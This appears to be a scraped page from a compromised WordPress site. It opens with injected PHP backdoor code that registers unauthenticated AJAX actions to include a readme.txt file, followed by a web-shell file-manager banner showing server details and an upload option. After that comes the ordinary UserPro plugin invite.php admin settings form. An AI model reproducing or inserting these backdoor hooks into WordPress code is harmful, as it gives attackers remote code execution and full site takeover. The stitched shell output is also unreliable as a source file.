if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/userpro/admin/panels/invite.php
<form method="post" action="">

<h3><?php _e('Invite Users Setting','userpro'); ?></h3>
<table class="form-table">

	<tr valign="top">
		<th scope="row"><label for="userpro_invite_emails_enable"><?php _e('Allow only invited users to register','userpro'); ?></label></th>
		<td>
			<select name="userpro_invite_emails_enable" id="userpro_invite_emails_enable" class="chosen-select" style="width:300px">
				<option value="1" <?php selected(1, userpro_get_option('userpro_invite_emails_enable')); ?>><?php _e('Yes','userpro'); ?></option>
				<option value="0" <?php selected(0, userpro_get_option('userpro_invite_emails_enable')); ?>><?php _e('No','userpro'); ?></option>
			</select>
		</td>
	</tr>
<tr valign="top">
		<th scope="row"><label for="invite_subject"><?php _e('Subject','userpro'); ?></label></th>
		<td><input type="text" name="invite_subject" id="invite_subject" value="<?php echo userpro_get_option('invite_subject'); ?>" class="regular-text" /></td>
	</tr>
	<tr>
		<th><label for="userpro_invite_emails_template"><?php _e('Email Template to send invitation email' , 'userpro')?></label></th>
		<td>
			
			<textarea name="userpro_invite_emails_template" id="userpro_invite_emails_template" class="large-text userpro-largeblock" ><?php echo userpro_get_option('userpro_invite_emails_template'); ?></textarea>
			<span class="up-description"><?php _e('Use {invitelink} at the place of your invitation link in your email template','userpro'); ?></span>
		</td>
	</tr>
</table>

<p class="submit">
	<input type="submit" name="submit" id="submit" class="up-admin-btn up-admin-btn--dark-blue small" value="<?php _e('Save Settings','userpro'); ?>"  />
</p>

<h3><?php _e('Invite Users','userpro'); ?></h3>
<table class="form-table">
<tr valign="top">
		<th scope="row"></th>
		<td>

			<span class="description" id="invite_success_msg"></span>
		</td>
	</tr>
	<tr valign="top">
		<th scope="row"><label for="userpro_invite_emails"><?php _e('Enter Email addresses to Invite','userpro'); ?></label></th>
		<td>
			<input type="text" name="userpro_invite_emails" id="userpro_invite_emails" value="" class="regular-text" />
			<span class="up-description"><?php _e('Enter Email addresses separated by comma','userpro'); ?></span>
		</td>
	</tr>
    <tr valign="top">
        <th scope="row"><label for="userpro_cc_invite_emails"><?php _e('Enter CC to Emails','userpro'); ?></label></th>
        <td>
            <input type="text" name="userpro_cc_invite_emails" id="userpro_cc_invite_emails" value="" class="regular-text" />
            <span class="up-description"><?php _e('Enter Email addresses separated by comma','userpro'); ?></span>
        </td>
    </tr>

	<tr>
		<th>
				<input type="submit" name="invite" id="invite" class="up-admin-btn approve small" value="<?php _e('Invite','userpro'); ?>"  />
		</th>
	</tr>
</table>
</form>